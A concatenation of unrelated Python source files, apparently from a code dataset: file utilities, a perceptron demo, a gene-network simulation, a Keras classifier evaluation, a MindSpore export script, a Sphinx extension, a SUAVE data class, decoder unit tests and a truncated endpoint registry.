"""Writes string to text file.
Args:
content_str: string to write
file_uri: (string) URI of file to write
Raise:
NotWritableError if file_uri cannot be written
"""
parsed_uri = urlparse(file_uri)
if parsed_uri.scheme == 's3':
bucket = parsed_uri.netloc
key = parsed_uri.path[1:]
with io.BytesIO(bytes(content_str, encoding='utf-8')) as str_buffer:
try:
s3 = boto3.client('s3')
s3.upload_fileobj(str_buffer, bucket, key)
except Exception:
raise NotWritableError('Could not write {}'.format(file_uri))
else:
make_dir(file_uri, use_dirname=True)
with open(file_uri, 'w') as content_file:
content_file.write(content_str)
def load_json_config(uri, message):
"""Load a JSON-formatted protobuf config file.
Args:
uri: (string) URI of config file
message: (google.protobuf.message.Message) empty protobuf message of
to load the config into. The type needs to match the content of
uri.
Returns:
the same message passed as input with fields filled in from uri
Raises:
ProtobufParseException if uri cannot be parsed
"""
try:
return json_format.Parse(file_to_str(uri), message)
except json_format.ParseError:
error_msg = ('Problem parsing protobuf file {}. '.format(uri) +
'You might need to run scripts/compile')
raise ProtobufParseException(error_msg)
def save_json_config(message, uri):
"""Save a protobuf object to a JSON file.
Args:
message: (google.protobuf.message.Message) protobuf message
uri: (string) URI of JSON file to write message to
Raises:
NotWritableError if uri cannot be written
"""
json_str = json_format.MessageToJson(message)
str_to_file(json_str, uri)
# Ensure that RV temp directory exists. We need to use a custom location for
# the temporary directory so it will be mirrored on the host file system which
# is needed for running in a Docker container with limited space on EC2.
RV_TEMP_DIR = '/opt/data/tmp/'
# find explicitly set tempdir
explicit_temp_dir = next(
iter([
os.environ.get(k) for k in ['TMPDIR', 'TEMP', 'TMP'] if k in os.environ
] + [tempfile.tempdir]))
try:
# try to create directory
if not os.path.exists(explicit_temp_dir):
os.makedirs(explicit_temp_dir, exist_ok=True)
# can we interact with directory?
explicit_temp_dir_valid = (os.path.isdir(explicit_temp_dir) and Path.touch(
Path(os.path.join(explicit_temp_dir, '.can_touch'))))
except Exception:
print('Root temporary directory cannot be used: {}. Using root: {}'.format(
explicit_temp_dir, RV_TEMP_DIR))
tempfile.tempdir = RV_TEMP_DIR # no guarantee this will work
make_dir(RV_TEMP_DIR)
finally:
# now, ensure uniqueness for this process
# the host may be running more than one rastervision process
RV_TEMP_DIR = tempfile.mkdtemp()
tempfile.tempdir = RV_TEMP_DIR
print('Temporary directory is: {}'.format(tempfile.tempdir))
|
python
|
import random
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.patches import Rectangle
class Point():
def __init__(self, x, y, label):
self.x = x
self.y = y
self.label = label
def get_x(self):
return self.x
def get_y(self):
return self.y
def get_label(self):
return self.label
class Perceptron():
def __init__(self):
self.W_x = random.uniform(0, 1.0)
self.W_y = random.uniform(0, 1.0)
self.W_b = random.uniform(0, 1.0)
def train(self, collection, adaptive=1):
solutions = 0
for point in collection:
a = self.W_x * point.x + self.W_y * \
point.y + self.W_b
#e_i = t_i - y_i
error = point.get_label() - self.activation(a)
if error == 0.0:
solutions += 1
else:
self.W_x += error * point.x * adaptive
self.W_y += error * point.y * adaptive
self.W_b = self.W_b + error
return solutions/len(collection)*100
def test(self, collection, adaptive=0):
solutions = 0
for point in collection:
a = self.W_x * point.x + self.W_y * \
point.y + self.W_b
error = point.get_label() - self.activation(a)
if error == 0.0:
solutions += 1
return solutions/len(collection)*100
def activation(self, a):
if(a >= 0):
return 1
else:
return 0
def randPoint(range):
x = random.randint(range[0], range[1])
y = random.randint(range[0], range[1])
label = 0
if(x <= y):
label = 1
return Point(x, y, label)
def learn(iterations, amount_of_points, debug=False):
points_range = (-50, 50)
points = []
training = []
testing = []
for i in range(0, amount_of_points):
points.append(randPoint(points_range))
cut = int(0.8 * len(points)) # 80% of the list
random.shuffle(points)
training = points[:cut] # first 80% of shuffled list
testing = points[cut:] # last 20% of shuffled list
percept = Perceptron()
trained_iter = None
for i in range(1, iterations+1):
train_output = percept.train(training, adaptive=0.25*(1/i))
#train_output = percept.train(training)
test_output = percept.test(testing)
if debug:
print("Epoch {:2d} Efficiency training {:3.2f}'%' Efficiency tests {:.2f}%".format(
i, train_output, test_output))
if not debug and train_output == 100:
trained_iter = i
break
if trained_iter is None:
trained_iter = iterations+1
return trained_iter
def drawPlot():
tmp = []
for i in range(1, 6):
tmp.append(learn(25, pow(10, i)))
# chart
x = np.arange(5)
labels = (10, 100, 1000, 10000, 100000)
fig, ax = plt.subplots()
plt.title(
"The impact of the number of points on learning")
# (iteration=iteration in which 100 '%' efficiency was achieved)
plt.bar(x, tmp)
plt.xticks(x, labels)
plt.xlabel('Points')
plt.ylabel('Iteration')
# the perceptron is the worst at 100 points, more points give
# faster results and is more stable, with fewer points it heavily depends
# on what points will be drawn
plt.show()
if __name__ == "__main__":
# function x = y
learn(25, 100, debug=True)
drawPlot()
|
python
|
import argparse
import sys
import csv
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
FLAGS = None
BATCH = 8000
Gs = 2 # num of dynamic dims
Gin= 2 # num of input signal dims
TIMESTEP = 0.25
time_points = 200
def Hill_model(x,b,K,links):
# x, current input and state [BATCH,Gin+Gs]
# b, max_rate for Hill activation term [BATCH,Gin+Gs,Gs]
# K, Micheales constant [BATCH,Gin+Gs, Gs]
# links, network topology +1/0/-1, [Gin+Gs, Gs]
Hill_n = 2
f0 = ((np.reshape(x,[BATCH,Gin+Gs,1]))**Hill_n)/(K**Hill_n+(np.reshape(x,[BATCH,Gin+Gs,1]))**Hill_n) #[BATCH,Gin+Gs,Gs]
f_activation1 = f0*b*np.reshape(links==1,[1,Gin+Gs,Gs])
f_activation2 = np.sum(f_activation1,axis=1) #[BATCH,Gs]
f_inhibition1 = (1-f0)*np.reshape(links==-1,[1,Gin+Gs,Gs]) + np.reshape(links!=-1,[1,Gin+Gs,Gs])
f_inhibition2 = np.prod(f_inhibition1,axis=1) #[BATCH,Gs]
f = (f_activation2)*f_inhibition2 #[BATCH,Gs]
return f
def Hill_model_dynamics(b,K,links):
gamma = 1
## inputs=0, 0
X0 = np.zeros([BATCH,time_points,Gs])
x0 = 0.1*np.ones([BATCH,Gs])
for t0 in range(time_points):
f0 = Hill_model(np.concatenate([np.zeros([BATCH,Gin]),x0],axis=1),b,K,links)
x0 = (1-gamma*TIMESTEP)*x0 + f0*TIMESTEP
X0[:,t0,:] = x0
hit0 = np.var(X0[:,time_points//2:,0],axis=1)<0.002
## inputs=0.8, 0
X1 = np.zeros([BATCH,time_points,Gs])
x1 = 0.1*np.ones([BATCH,Gs])
for t1 in range(time_points):
f1 = Hill_model(np.concatenate([0.8*np.ones([BATCH,1]),np.zeros([BATCH,1]),x1],axis=1),b,K,links)
x1 = (1-gamma*TIMESTEP)*x1 + f1*TIMESTEP
X1[:,t1,:] = x1
grad1= X1[:,time_points//2:,0] - X1[:,(time_points//2-1):-1,0]
hit1 = (np.var(X1[:,time_points//2:,0],axis=1)>0.01) *\
((np.max(grad1,axis=1)*np.min(grad1,axis=1))<-0.001)
## inputs=0, 0.8
X2 = np.zeros([BATCH,time_points,Gs])
x2 = 0.1*np.ones([BATCH,Gs])
for t2 in range(time_points):
f2 = Hill_model(np.concatenate([np.zeros([BATCH,1]),0.8*np.ones([BATCH,1]),x2],axis=1),b,K,links)
x2 = (1-gamma*TIMESTEP)*x2 + f2*TIMESTEP
X2[:,t2,:] = x2
hit2 = (np.mean(X2[:,time_points//2:,0],axis=1)>4*np.mean(X0[:,time_points//2:,0],axis=1)) *\
(np.var(X2[:,time_points//2:,0],axis=1)<0.002)
#hit_ = np.random.rand(BATCH)<0.01 # for debug
hit_ = hit0*hit1*hit2
return X0[hit_,:,:], X1[hit_,:,:], X2[hit_,:,:], hit_
def main(_):
if not os.path.exists(repr(FLAGS.run_num)):
os.mkdir(repr(FLAGS.run_num))
if not os.path.exists(repr(FLAGS.run_num)+'/train'):
os.mkdir(repr(FLAGS.run_num)+'/train')
if not os.path.exists(repr(FLAGS.run_num)+'/para'):
os.mkdir(repr(FLAGS.run_num)+'/para')
# constraints on network connections
links_primary = np.genfromtxt(repr(FLAGS.run_num)+'/links_primary.csv','float',delimiter=',')
N_edges = np.sum(links_primary==1)
topology_writer = csv.writer(open(repr(FLAGS.run_num)+'/all_topologies.csv', 'w'))
for topo_i in range(2**(N_edges)):
links0 = np.array(list(bin(topo_i)[2:]),'float')
if len(links0) < (N_edges):
links0 = np.concatenate([np.zeros(N_edges-len(links0)), links0], axis=0)
links = np.copy(links_primary)
links[links!=0] = (-1)**links0
print('topology#'+repr(topo_i))
print(links)
#topology_writer.writerow(np.int16(np.concatenate([np.reshape(topo_i,[1]),np.reshape(links,[-1])],axis=0)))
if Ture:
X0s = []
X1s = []
X2s = []
bs = []
Ks = []
for n in range(20):
b = np.random.exponential(1,[BATCH,Gin+Gs,Gs])
K = np.random.exponential(1,[BATCH,Gin+Gs,Gs])
X0,X1,X2,hit_ = Hill_model_dynamics(b,K,links)
if len(X0) is not 0:
X0s.append(X0[:,:,0])
X1s.append(X1[:,:,0])
X2s.append(X2[:,:,0])
bs.append(b[hit_,:,:]*links_primary)
Ks.append(K[hit_,:,:]*links_primary)
print('step'+repr(n)+', hit '+repr(len(X0[:,0,0])))
if len(X0s) is not 0:
bs_ = np.concatenate(bs,axis=0)
Ks_ = np.concatenate(Ks,axis=0)
parameters = np.concatenate([np.reshape(bs_,[-1,(Gin+Gs)*Gs]),\
np.reshape(Ks_,[-1,(Gin+Gs)*Gs])], axis=1) #[~,2*(Gin+Gs)*Gs]
np.savetxt(repr(FLAGS.run_num)+'/para/topology'+repr(topo_i)+'.csv', parameters, fmt='%.4f', delimiter=',')
topology_writer.writerow(np.int16(np.concatenate([np.reshape(topo_i,[1]),np.reshape(links,[-1])],axis=0)))
X0s_ = np.concatenate(X0s,axis=0)
X1s_ = np.concatenate(X1s,axis=0)
X2s_ = np.concatenate(X2s,axis=0)
plt.subplot(3,1,1)
plt.plot(np.transpose(X0s_),'-')
plt.subplot(3,1,2)
plt.plot(np.transpose(X1s_),'-')
plt.subplot(3,1,3)
plt.plot(np.transpose(X2s_),'-')
plt.savefig(repr(FLAGS.run_num)+'/train/topology'+repr(topo_i))
plt.close()
else:
print('NULL')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--run_num', type=int, default=3, help='***')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
|
python
|
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from numpy import mean
from sklearn.metrics import accuracy_score
from classifier_load_data import tokenizer, sequence_length
def prob_to_class(probs):
return [1 if p >= 0.5 else 0 for p in probs]
# Passing in the relative path of the trained HDF5 format model.
def calculate_accuracy(model_path):
# Loading test data.
with open("corpora/resplit/sanitised/dem_test.txt", encoding="utf-8") as f:
dem_test = f.read().split("\n")
with open("corpora/resplit/sanitised/rep_test.txt", encoding="utf-8") as f:
rep_test = f.read().split("\n")
# Establishing padded samples.
dem_samples = pad_sequences(tokenizer.texts_to_sequences(dem_test), maxlen=sequence_length)
rep_samples = pad_sequences(tokenizer.texts_to_sequences(rep_test), maxlen=sequence_length)
# Loading model and running predictions.
model = load_model(model_path)
dem_pred_prob = [p[0] for p in model.predict(x=dem_samples).tolist()]
rep_pred_prob = [p[0] for p in model.predict(x=rep_samples).tolist()]
dem_predictions = prob_to_class(dem_pred_prob)
rep_predictions = prob_to_class(rep_pred_prob)
# Calculating overall accuracy.
dem_acc = accuracy_score([1 for _ in dem_predictions], dem_predictions)
rep_acc = accuracy_score([0 for _ in rep_predictions], rep_predictions)
# Printing results then writing to file.
accuracy = "Democrats: {}\nRepublicans: {}\nAverage: {}\n\n" \
"Mean democrat prediction probability: {}\nMean republican prediction probability: {}\n" \
.format(dem_acc, rep_acc, (dem_acc + rep_acc) / 2, mean(dem_pred_prob), mean(rep_pred_prob))
print(accuracy)
with open(model_path.split(".h5")[0] + "_accuracy.txt", "w") as f:
f.write(accuracy)
|
python
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
##############export checkpoint file into air and onnx models#################
python export.py
"""
import argparse
import numpy as np
from mindspore import Tensor, load_checkpoint, load_param_into_net, export, context
from ISyNet.model import ISyNet
PARSER = argparse.ArgumentParser(description="IsyNet export")
PARSER.add_argument("--device_target", type=str, default='Ascend', help="device target")
PARSER.add_argument("--device_id", type=int, default=0, help="device id")
PARSER.add_argument("--jsonFile", type=str, default='./json/ISyNet-N0.json', help="json architecture description")
PARSER.add_argument("--weight_standardization", default=0, type=int, help="weight standardization")
PARSER.add_argument("--lastBN", type=int, default=1, help="last batch norm")
PARSER.add_argument("--batch_size", type=int, default=1, help="batch size")
PARSER.add_argument("--width", type=int, default=224, help="image width")
PARSER.add_argument("--height", type=int, default=224, help="image height")
PARSER.add_argument("--file_name", type=str, default='ISyNet-N0.json', help="output file name")
PARSER.add_argument("--file_format", type=str, default='MINDIR', help="output file format")
PARSER.add_argument("--checkpoint_file_path", type=str, default=None, help="checkpoint")
ARGS = PARSER.parse_args()
context.set_context(mode=context.GRAPH_MODE, device_target=ARGS.device_target)
if ARGS.device_target == "Ascend":
context.set_context(device_id=ARGS.device_id)
def run_export():
"""run export."""
net = ISyNet(num_classes=1001,
json_arch_file_backbone=ARGS.jsonFile,
dropout=0,
weight_standardization=ARGS.weight_standardization,
last_bn=ARGS.lastBN,
dml=0,
evaluate=True)
assert ARGS.checkpoint_file_path is not None, "checkpoint_path is None."
param_dict = load_checkpoint(ARGS.checkpoint_file_path)
load_param_into_net(net, param_dict)
input_arr = Tensor(np.zeros([ARGS.batch_size, 3, ARGS.height, ARGS.width], np.float32))
export(net, input_arr, file_name=ARGS.file_name, file_format=ARGS.file_format)
if __name__ == '__main__':
run_export()
|
python
|
from .schema_base import SchemaBase
|
python
|
# -*- coding: utf-8 -*-
# Copyright (c) 2010, 2011, Sebastian Wiesner <[email protected]>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Willow Garage BSD License not applicable
__version__ = '0.4.1'
import sys
import shlex
import os
from os import path
from docutils import nodes
from docutils.parsers import rst
from docutils.parsers.rst.directives import flag, unchanged
from sphinx import addnodes
from sphinx.util.osutil import ensuredir
from sphinx.ext.graphviz import graphviz as graphviz_node
import ecto
class ectocell(nodes.Element):
pass
def _slice(value):
parts = [int(v.strip()) for v in value.split(',')]
if len(parts) > 2:
raise ValueError('too many slice parts')
return tuple((parts + [None]*2)[:2])
def make_ectocelldirective(modname, celltype, state, content=None, content_offset=0):
node = ectocell()
contentnode = nodes.paragraph()
if content != None:
state.nested_parse(content, content_offset, contentnode)
node.modname = modname
node.celltype = celltype
node.content = contentnode
env = state.document.settings.env
targetid = 'index-%s' % env.new_serialno('index')
targetnode = nodes.target('', '', ids=[targetid, node.modname + "." + node.celltype])
state.document.note_explicit_target(targetnode)
indexnode = addnodes.index()
indexnode['entries'] = ne = []
indexnode['inline'] = False
s = 'Cell; ' + celltype + ' (module ' + modname + ')'
ne.append(('single', s, targetid, s))
modfirstindexarg = celltype + ' (ecto cell in module ' + modname + ')'
ne.append(('single', modfirstindexarg,
targetid, modfirstindexarg))
return [indexnode, targetnode, node]
class EctoCellDirective(rst.Directive):
has_content = True
final_argument_whitespace = True
required_arguments = 2
option_spec = dict(shell=flag, prompt=flag, nostderr=flag,
ellipsis=_slice, extraargs=unchanged)
def run(self):
return make_ectocelldirective(self.arguments[0], self.arguments[1], self.state,
self.content, self.content_offset)
def docize(CellType, content):
d = {}
def is_bp_enum(thing):
return 'Boost.Python.enum' in str(thing.__class__.__bases__)
def gettendril(name, tendrils, isparam):
d = {}
if len(tendrils) == 0:
return nodes.paragraph()
section = nodes.title(text=name)
lst = nodes.bullet_list()
section += lst
for k, v in tendrils:
entry = nodes.list_item()
lst += entry
para = nodes.paragraph()
entry += para
d[k] = dict(doc=v.doc,
type_name = v.type_name,
required = v.required)
if v.has_default:
try:
default = str(v.val)
except TypeError, e:
default = '[not visible from python]'
para += [nodes.strong(k, k), nodes.literal('', ' '),
nodes.emphasis('', ' type: '), nodes.literal('', v.type_name + " ")]
para += nodes.literal('', ' ')
if isparam:
if not v.required:
para += nodes.emphasis('', ' not ')
para += nodes.emphasis('', 'required')
para += nodes.literal('', ' ')
if v.has_default:
para += [nodes.emphasis('', " default: "), nodes.literal('', default)]
else:
para += nodes.emphasis('', ' no default value')
try:
if is_bp_enum(v.val):
valpara = nodes.paragraph()
valpara += nodes.emphasis('', 'Legal Values: ')
for thevalue, thename in v.val.values.iteritems():
valpara += nodes.literal('', "%s (%d) " % (str(thename), thevalue))
para += valpara
except TypeError, e:
pass # didn't convert to python, but okay. maybe v.val was boost::posix_time::ptime or something.
entry += nodes.paragraph('', v.doc)
return section
d['name'] = CellType.__name__
d['short_doc'] = getattr(CellType, 'short_doc','')
cell = nodes.section()
cell += nodes.title(text=CellType.__name__)
cell += content
top = nodes.topic()
cell += top
cell['ids'].append(CellType.__name__)
cell['names'].append(CellType.__name__)
para = nodes.title(text="Brief doc")
para += nodes.paragraph(text=d['short_doc'])
top += para
inst = CellType.inspect()
top += gettendril('Parameters', inst.params, True)
top += gettendril('Inputs', inst.inputs, False)
top += gettendril('Outputs', inst.outputs, False)
return cell
def do_ectocell(app, doctree):
for node in doctree.traverse(ectocell):
c = __import__(node.modname, fromlist=[str(node.celltype)])
if node.celltype not in c.__dict__:
raise RuntimeError("Cell %s not found in module %s" % (node.celltype, str(c)))
new_node = docize(c.__dict__[node.celltype], node.content)
node.replace_self(new_node)
def setup(app):
app.add_directive('ectocell', EctoCellDirective)
app.connect('doctree-read', do_ectocell)
|
python
|
## @ingroup Core
# DiffedData.py
#
# Created: Feb 2015, T. Lukacyzk
# Modified: Feb 2016, T. MacDonald
# Jun 2016, E. Botero
# ----------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------
from copy import deepcopy
from .Container import Container as ContainerBase
from .Data import Data
from .DataOrdered import DataOrdered
import numpy as np
# ----------------------------------------------------------------------
# Config
# ----------------------------------------------------------------------
## @ingroup Core
class Diffed_Data(Data):
""" This is for creating a data new class where a different copy is saved.
This is useful for creating a new configuration of a vehicle.
Assumptions:
N/A
Source:
N/A
"""
def __defaults__(self):
""" A stub for all classes that come later
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
self.tag = 'config'
self._base = Data()
self._diff = Data()
def __init__(self,base=None):
""" Initializes the new Diffed_Data() class through a deepcopy
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
if base is None: base = Data()
self._base = base
this = deepcopy(base) # deepcopy is needed here to build configs - Feb 2016, T. MacDonald
Data.__init__(self,this)
def store_diff(self):
""" Finds the differences and saves them
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
delta = diff(self,self._base)
self._diff = delta
def pull_base(self):
""" Updates the differences
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
try: self._base.pull_base()
except AttributeError: pass
self.update(self._base)
self.update(self._diff)
def __str__(self,indent=''):
""" This function is used for printing the class.
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
try:
args = self._diff.__str__(indent)
args += indent + '_base : ' + self._base.__repr__() + '\n'
args += indent + ' tag : ' + self._base.tag + '\n'
return args
except AttributeError:
return Data.__str__(self,indent)
def finalize(self):
""" This just does a pull_base()
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
## dont do this here, breaks down stream dependencies
# self.store_diff
self.pull_base()
# ----------------------------------------------------------------------
# Config Container
# ----------------------------------------------------------------------
class Container(ContainerBase):
""" A dict-type container with attribute, item and index style access
intended to hold a attribute-accessible list of Data(). This is unordered.
Assumptions:
N/A
Source:
N/A
"""
def append(self,value):
""" Appends the value to the containers
Assumptions:
None
Source:
N/A
Inputs:
self
Outputs:
N/A
Properties Used:
N/A
"""
try: value.store_diff()
except AttributeError: pass
ContainerBase.append(self,value)
def pull_base(self):
""" Updates the differences
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
for config in self:
try: config.pull_base()
except AttributeError: pass
def store_diff(self):
""" Finds the differences and saves them
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
for config in self:
try: config.store_diff()
except AttributeError: pass
def finalize(self):
""" This just does a pull_base()
Assumptions:
N/A
Source:
N/A
Inputs:
N/A
Outputs:
N/A
Properties Used:
N/A
"""
for config in self:
try: config.finalize()
except AttributeError: pass
# ------------------------------------------------------------
# Handle Linking
# ------------------------------------------------------------
Diffed_Data.Container = Container
# ------------------------------------------------------------
# Diffing Function
# ------------------------------------------------------------
def diff(A,B):
""" The magic diff function that makes Diffed_Data() work
Assumptions:
N/A
Source:
N/A
Inputs:
A
B
Outputs:
Result
Properties Used:
N/A
"""
keys = set([])
keys.update( A.keys() )
keys.update( B.keys() )
if isinstance(A,Diffed_Data):
keys.remove('_base')
keys.remove('_diff')
result = type(A)()
result.clear()
for key in keys:
va = A.get(key,None)
vb = B.get(key,None)
if isinstance(va,Data) and isinstance(vb,Data):
sub_diff = diff(va,vb)
if sub_diff:
result[key] = sub_diff
elif isinstance(va,Data) or isinstance(vb,Data):
result[key] = va
elif isinstance(va,DataOrdered) and isinstance(vb,DataOrdered):
sub_diff = diff(va,vb)
if sub_diff:
result[key] = sub_diff
elif isinstance(va,DataOrdered) or isinstance(vb,DataOrdered):
result[key] = va
elif not np.all(va == vb):
result[key] = va
return result
|
python
|
import json
from unittest import TestCase
from GeneralTests.EMInfraResponseTestDouble import ResponseTestDouble
from OTLMOW.Facility.FileFormats.EMInfraDecoder import EMInfraDecoder
from OTLMOW.Facility.OTLFacility import OTLFacility
from OTLMOW.OTLModel.Classes.Omvormer import Omvormer
class EMInfraDecoderTests(TestCase):
def test_decodeFirstEntry(self):
responseString = ResponseTestDouble().response
otl_facility = OTLFacility(logfile='', settings_path='C:\\resources\\settings_OTLMOW.json')
decoder = EMInfraDecoder()
first = decoder.decodeGraph(responseString)[0]
with self.subTest("Testing type match"):
self.assertTrue(isinstance(first, Omvormer))
self.assertEqual("https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Omvormer", first.typeURI)
with self.subTest("Testing keuzelijst"):
self.assertEqual("Encoder", first.type)
self.assertEqual("in-gebruik", first.toestand)
with self.subTest("Testing StringField"):
self.assertEqual("ENCA0469", first.naam)
self.assertEqual(None, first.notitie)
with self.subTest("Testing BooleanField"):
self.assertEqual(True, first.isActief)
with self.subTest("Testing Dte"):
self.assertEqual("10.216.10.33", first.ipAdres.waarde)
with self.subTest("Testing Dtc"):
self.assertEqual("AWV", first.assetId.toegekendDoor)
self.assertEqual("0005bafb-838f-47e0-a4e2-20dd120ede6b-b25kZXJkZWVsI09tdm9ybWVy", first.assetId.identificator)
def test_decode_single_entry(self):
responseString = ResponseTestDouble().single_response
otl_facility = OTLFacility(logfile='', settings_path='C:\\resources\\settings_OTLMOW.json')
decoder = EMInfraDecoder()
first = decoder.decodeGraph(responseString)[0]
with self.subTest("Testing type match"):
self.assertEqual("https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Stroomkring", first.typeURI)
with self.subTest("Testing keuzelijst"):
self.assertEqual("in-gebruik", first.toestand)
with self.subTest("Testing StringField"):
self.assertEqual("A10N47.4.K_stroomkring", first.naam)
self.assertEqual(None, first.notitie)
with self.subTest("Testing BooleanField"):
self.assertEqual(True, first.isActief)
with self.subTest("Testing geometry"):
self.assertEqual("POINT Z (101489.3 190526.6 0)", first.geometry)
with self.subTest("Testing Dtc"):
self.assertEqual("AWV", first.assetId.toegekendDoor)
self.assertEqual("000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n", first.assetId.identificator)
def test_trim_jsonld_dict_single_response(self):
responseString = ResponseTestDouble().single_response
dict_obj = json.loads(responseString)
obj = dict_obj["@graph"][0]
decoder = EMInfraDecoder()
result = decoder.trim_json_ld_dict(obj)
expected = {
'@id': 'https://data.awvvlaanderen.be/id/asset/000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n',
'@type': 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Stroomkring',
'assetId': {'identificator': '000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n',
'toegekendDoor': 'AWV'},
'geo:log': [{'geo:bron': 'overerving',
'geo:gaVersie': 'GA_2.2.0',
'geo:geometrie': {'geo:punt': 'POINT Z(101489.3 190526.6 0)'},
'geo:nauwkeurigheid': '',
'geo:niveau': '-1',
'geo:overerving': [{'geo:erfgenaamId': {
'identificator': '000d3091-deca-4714-8f82-d95aace9ea90-b25kZXJkZWVsI1N0cm9vbWtyaW5n',
'toegekendDoor': 'AWV'},
'geo:erflaatId': {
'identificator': 'b59f3b37-fe77-4677-9e7c-e5491319e759-b25kZXJkZWVsI0xhYWdzcGFubmluZ3Nib3Jk',
'toegekendDoor': 'AWV'},
'geo:relatieId': {
'identificator': 'b80e2ca4-123c-46ac-b747-4b6e8075bf78-b25kZXJkZWVsI0JldmVzdGlnaW5n',
'toegekendDoor': 'AWV'}}]}],
'isActief': True,
'loc:geometrie': 'POINT Z(101489.3 190526.6 0)',
'loc:omschrijving': '',
'loc:puntlocatie': {'loc:adres': {'loc:bus': '',
'loc:gemeente': 'Gent',
'loc:nummer': '35',
'loc:postcode': '9051',
'loc:provincie': 'Oost-Vlaanderen',
'loc:straat': 'Luchthavenlaan'},
'loc:bron': '',
'loc:precisie': '',
'loc:puntgeometrie': {'loc:lambert72': {'loc:xcoordinaat': 101489.3,
'loc:ycoordinaat': 190526.6,
'loc:zcoordinaat': 0}},
'loc:weglocatie': {'loc:gemeente': 'Gent',
'loc:ident2': 'A10',
'loc:ident8': 'A0100002',
'loc:referentiepaalAfstand': -9,
'loc:referentiepaalOpschrift': 47.4,
'loc:straatnaam': ''}},
'naam': 'A10N47.4.K_stroomkring',
'notitie': '',
'toestand': 'in-gebruik',
'typeURI': 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Stroomkring'}
self.assertEqual(expected, result)
def test_decode(self):
responseString = ResponseTestDouble().response
decoder = EMInfraDecoder()
lijst = decoder.decodeGraph(responseString)
self.assertEqual(56, len(lijst))
def test_trim_keys_from_ld_notation(self):
decoder = EMInfraDecoder()
with self.subTest("Testing Dtc"):
value = {'DtcIdentificator.toegekendDoor': 'AWV',
'DtcIdentificator.identificator': '0005bafb-838f-47e0-a4e2-20dd120ede6b-b25kZXJkZWVsI09tdm9ybWVy'}
result = decoder.trim_json_ld_dict(value)
expected = {'toegekendDoor': 'AWV', 'identificator': '0005bafb-838f-47e0-a4e2-20dd120ede6b-b25kZXJkZWVsI09tdm9ybWVy'}
self.assertDictEqual(expected, result)
with self.subTest("Testing Boolean"):
value = True
result = decoder.trim_json_ld_dict(value)
expected = True
self.assertEqual(expected, result)
with self.subTest("Testing Kard *"):
value = ["geel", "rood"]
result = decoder.trim_json_ld_dict(value)
expected = ["geel", "rood"]
self.assertListEqual(expected, result)
with self.subTest("Testing Kard * ComplexField"):
value = [
{'DtcExterneReferentie.externReferentienummer': 'extern ref 1', 'DtcExterneReferentie.externePartij': 'extern 1'},
{'DtcExterneReferentie.externReferentienummer': 'extern ref 2', 'DtcExterneReferentie.externePartij': 'extern 2'}]
result = decoder.trim_json_ld_dict(value)
expected = [{'externReferentienummer': 'extern ref 1', 'externePartij': 'extern 1'},
{'externReferentienummer': 'extern ref 2', 'externePartij': 'extern 2'}]
self.assertListEqual(expected, result)
|
python
|
import logging
import pathlib
class Endpoint:
def __init__(self, source_file, addr, port):
self.name = pathlib.Path(source_file).stem
self.addr = addr
self.port = port
def __repr__(self):
return f'{self.name}@{self.addr}:{self.port}'
class EndpointRegistry:
registry = dict()
@classmethod
